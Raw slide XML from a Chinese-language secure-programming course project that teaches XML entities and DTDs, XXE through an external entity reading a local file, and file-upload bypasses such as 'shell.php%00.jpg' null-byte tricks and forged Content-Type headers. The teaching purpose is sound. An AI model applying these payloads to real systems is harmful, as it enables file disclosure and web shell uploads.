              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>在網站設計中，常被用於實作 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>AJAX(Asynchronous JavaScript and XML)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的技術</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0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1238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0E909F-8746-8848-5CA9-B220B4C3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/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>預先定義好的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW"/>
              <a:t>Entity</a:t>
            </a:r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5774408-F7B0-34FA-A9C4-E0889E0D0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759474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由於有些符號在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>有特殊的意義，所以不會當作一般文字去解析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62E73AD-0F60-59D7-F6CD-CF3B2F2E4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869847"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="581192" y="2939971"/>
          <a:ext cx="4871496" cy="2331720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2435748">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="867824909"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2435748">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="29684668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XML Entity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1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>XML Entity</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>取代符號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697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&amp;amp;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&amp;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413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&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>lt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>;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&lt;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01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&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>gt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>;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&gt;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124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&amp;apos;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‘</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US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74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&amp;quot;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  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:ea typeface="Kaiti SC" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>’’</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:ea typeface="Kaiti SC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1183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94EBBE3D-2921-9BD5-9E61-76AE71376476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5837498" y="3317865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/>
              <a:t>&lt;message&gt;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400"/>
              <a:t> 10 &lt;/message&gt;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/>
              <a:t>需寫成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400"/>
              <a:t>message&gt;1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400"/>
              <a:t>10 &lt;/message&gt;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/>
              <a:t>因為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>會被當作是一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="240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" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>的開頭</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1720089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28ED94-6283-18EC-83EF-80B8C868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DTD(Document Type Definition)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283719-E0A6-4E7E-8D55-F6F260148C0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="1944547"/>
            <a:ext cx="474316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&lt;!DOCTYPE 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[ </a:t>
            </a:r>
          </a:p>
          <a:p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	&lt;!ELEMENT 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)&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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&lt;!ELEMENT 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#PCDATA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)&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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&lt;!ELEMENT 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#PCDATA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)&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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&lt;!ATTLIST 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	id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CDATA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#REQUIRED</a:t>
            </a:r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]&gt;</a:t>
            </a:r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endParaRPr lang="en" altLang="zh-TW" b="0" i="0" u="none" strike="noStrike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TW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i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="795DA3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" altLang="zh-TW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&gt;John Doe&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW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" altLang="zh-TW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&gt;30&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW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TW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" altLang="zh-TW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CE9127-98E4-44AD-8352-A172D8951727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631084" y="1905506"/>
            <a:ext cx="60998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定義了一個名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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person</a:t>
            </a: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的元素</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="24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333333"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>包</a:t>
            </a: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含了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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name </a:t>
            </a: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和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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age </a:t>
            </a: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兩個子元素</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="24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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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PCDATA: Parsed Character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要用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="24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lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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;</a:t>
            </a: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代替 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&lt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2400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333333"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>CDATA : Character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333333"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>不需用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="24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lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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;</a:t>
            </a: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代替 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&lt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333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當使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Parser </a:t>
            </a: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解析時，可以進行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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DTD </a:t>
            </a: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驗證，確保 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW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XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="24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文件符合所定義的結構和規則。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750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7FF71D-8D74-2726-08B3-9C4C8AAD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/>
              <a:t>系統架構與資料庫設計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808091A2-A8F8-B048-C588-3E8485E4E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965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436D2-46EC-9395-AEC1-12CD00AB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/>
              <a:t>DTD </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>也可以用來定義</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW"/>
              <a:t>Entity</a:t>
            </a:r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75CA55-D2FB-A426-1269-D7B625CA3D97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581191" y="2507638"/>
            <a:ext cx="50055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&lt;!DOCTYPE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[ </a:t>
            </a:r>
          </a:p>
          <a:p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	&lt;!ENTITY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name1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TW" altLang="en-US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商東峻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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	&lt;!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ENTITY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name2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TW" altLang="en-US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李昱佑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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	&lt;!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ENTITY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name3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TW" altLang="en-US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林佳笙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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]&gt;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endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="0" i="0" u="none" strike="noStrike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TW" sz="24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" altLang="zh-TW" sz="24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TW" sz="2400" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0070C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&amp;name1;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TW" sz="24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TW" sz="24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endParaRPr lang="zh-TW" altLang="en-US" sz="240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D9CBCB2-D932-B5B8-2900-0269DFF91940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5586714" y="3759127"/>
            <a:ext cx="906683" cy="544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1B510B-C8AE-F5EA-6410-131203C4389F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6605288" y="2491995"/>
            <a:ext cx="50055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&lt;!DOCTYPE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[ </a:t>
            </a:r>
          </a:p>
          <a:p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	&lt;!ENTITY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name1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TW" altLang="en-US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商東峻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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	&lt;!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ENTITY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name2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TW" altLang="en-US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李昱佑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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	&lt;!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ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2400" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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zh-TW" altLang="en-US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林佳笙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="DF5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altLang="zh-TW" sz="2400" b="0" i="0" u="none" strike="noStrike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]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="0" i="0" u="none" strike="noStrike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TW" sz="24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" altLang="zh-TW" sz="24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zh-TW" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0070C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商東峻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TW" sz="24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TW" sz="24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" altLang="zh-TW" sz="24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373704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0BC24-F638-E821-1F98-266E6FC6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/>
              <a:t>XML external entities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594E73-D4B9-8DDA-D581-4555E11B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701600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2800"/>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>除了可以在文件內部定義，也可以使用外部的檔案來定義。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16F237-6609-8226-62D3-981CBB06969A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581191" y="2905780"/>
            <a:ext cx="1125970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>
                <a:solidFill>
                  <a:srgbClr val="969896"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="969896"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> [ &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>name1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="969896"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="A71D5D"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SYSTEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="969896"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="DF5000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"file://~/name1.txt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="969896"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> &gt; ]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="28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TW" sz="28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" altLang="zh-TW" sz="28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sz="28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" altLang="zh-TW" sz="28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sz="28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TW" sz="2800" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0070C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&amp;name1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="28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TW" sz="28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zh-TW" sz="28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" altLang="zh-TW" sz="28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TW" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="63A35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en" altLang="zh-TW" sz="2800" b="0" i="0" u="none" strike="noStrike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&gt;</a:t>
            </a:r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2547131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ED93D-7EB4-A4A1-A503-C45FD960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DEMO</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>影片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0FEFEED-BB15-EAA3-EA39-AE7FE014478E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046971" y="578651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https://youtu.be/yjcaA1Mwspk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="線上媒體 7" descr="安全程式設計-期末專案-XXE">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DEC881-6ACE-3B47-26FB-4CD11B2DBEB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64062" y="2360422"/>
            <a:ext cx="6063876" cy="34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CAFC8-2D92-7EA3-443B-4AACFCF5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任意檔案上傳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E9CB5C-213C-7305-3100-FE594FCB2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5825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48BD1-0485-E872-77D6-CA80F620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成因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1927F-643E-C4DB-9018-19A0C2509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sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>網站對使用者上傳的檔案沒有過濾檔案格式，或過濾機制不完全</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>上傳後的資料有開啟的權限</a:t>
            </a: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030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32F07-2B96-50BC-4409-22B4F5DD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攻擊的方式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FBA102-F482-51D1-756F-EB108EE1B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/>
              <a:t>透過前端進行檔案格式驗證</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t> 前端判斷只有結尾為</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2800"/>
              <a:t>jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en" sz="2800"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>才可上傳</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>可藉由攔截封包並修改進行繞過</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>或是直接修改前端的原始碼進行繞過</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39724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BF758-96C6-BB67-CED6-C6C4C603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攻擊的方式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63D461-188F-9D8E-79FF-5695CA0C6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/>
              <a:t>透過後端黑名單驗證</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>透過副檔名的黑名單進行驗證</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>假如有開發者沒考量到的副檔名，則可以繞過</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1756677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624DF-E830-8713-4EFF-92D6FFB5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攻擊的方式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9B8C88-6310-68C6-DBFA-B1427959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zh-TW" altLang="en-US" sz="3200"/>
              <a:t>透過白名單驗證</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>較難攻擊</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2800"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2800"/>
              <a:t>5.3.4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t> 版本以前，可藉由在副檔名中加上</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800"/>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>字元，因為該版本會在遇到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800"/>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>字元時會認為是終止符</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>所以可以上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2800"/>
              <a:t>shell.php%00.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en" sz="2800"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>這可使該檔案通過後端的檢查，並且在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2800" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>當中會被解讀為</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2800" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-TW" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3634195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45698B-21F3-9300-21E7-B823738F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攻擊的方式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C184D8-9432-0073-E565-DE6B02F16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/>
              <a:t>修改封包中的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="3200"/>
              <a:t>Content-Type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="3200"/>
              <a:t>如果後端只驗證</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="3200"/>
              <a:t>MIME(Multipurpose Internet Mail Extensions)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en" sz="3200"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="3200"/>
              <a:t>就可以藉由修改封包的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="3200"/>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="3200"/>
              <a:t>繞過</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="883470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45698B-21F3-9300-21E7-B823738F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MIME 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C184D8-9432-0073-E565-DE6B02F1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09850"/>
            <a:ext cx="11029615" cy="3902420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>網路標準</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2800">
              <a:latin typeface="Microsoft JhengHei"/>
              <a:ea typeface="微軟正黑體"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike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用來表示文件、檔案等等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" b="0" i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="3A3A3A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
